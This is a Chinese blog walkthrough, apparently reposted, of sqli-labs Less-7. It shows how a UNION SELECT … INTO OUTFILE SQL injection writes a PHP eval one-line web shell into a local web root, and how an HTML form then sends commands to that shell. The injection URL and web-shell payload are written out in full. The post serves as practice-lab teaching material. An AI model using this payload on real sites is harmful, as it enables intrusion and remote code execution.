码迷,mamicode.com
首页 > 数据库 > 详细

【sqli-labs】 less7 GET - Dump into outfile - String (导出文件GET字符型注入)

时间:2018-01-19 11:35:43      阅读:692      评论:0      收藏:0      [点我收藏+]

标签:eva   构造   gpo   col   sel   png   name   屏蔽   ima   

使用此漏洞需要知道WEB程序的根路径并且MYSQL的secure-file-priv配置应为可写入该路径

技术分享图片

添加单引号,发现错误被屏蔽

技术分享图片

对应的SQL语句应为

select ... from ... where xx=((1)) ...

技术分享图片

字段还是3个

技术分享图片

在数据库中执行测试,看是否能写入成功

SELECT * FROM users WHERE id=((1)) UNION SELECT 1,2,111 into outfile D:\phpStudy\PHPTutorial\WWW\1.php#)) LIMIT 0,1

技术分享图片

修改my.ini

secure-file-priv=""

重启MYSQL,测试写入,注意/需要转义

select * from users WHERE id=((a)) union select 1,2,11111 into outfile D://phpStudy//PHPTutorial//WWW//1.php#)) LIMIT 0,1

技术分享图片

技术分享图片

 

 技术分享图片

构造GET请求,写入一句话木马

<?php @eval($_POST["c"]);?>  
http://localhost/sqli/Less-7/?id=a‘)) union select 1,2,‘<?php @eval($_POST["c"]);?>‘ into outfile ‘D://phpStudy//PHPTutorial//WWW//mm.php‘%23

技术分享图片

【注】这个并不是MYSQL执行出错,查看源码可知

 row为空就会显示该错误

 技术分享图片

访问,文件成功写入

技术分享图片

新建一个本地HTML

<html>  
    <body>  
        <form action="http://localhost/mm.php" method="post">  
            <input type="text" name="c" value="phpinfo();">  
            <input type="submit" value="submit">  
        </form>  
    </body>  
</html>

技术分享图片

技术分享图片

 

【sqli-labs】 less7 GET - Dump into outfile - String (导出文件GET字符型注入)

标签:eva   构造   gpo   col   sel   png   name   屏蔽   ima   

原文地址:https://www.cnblogs.com/superkrissV/p/8315087.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!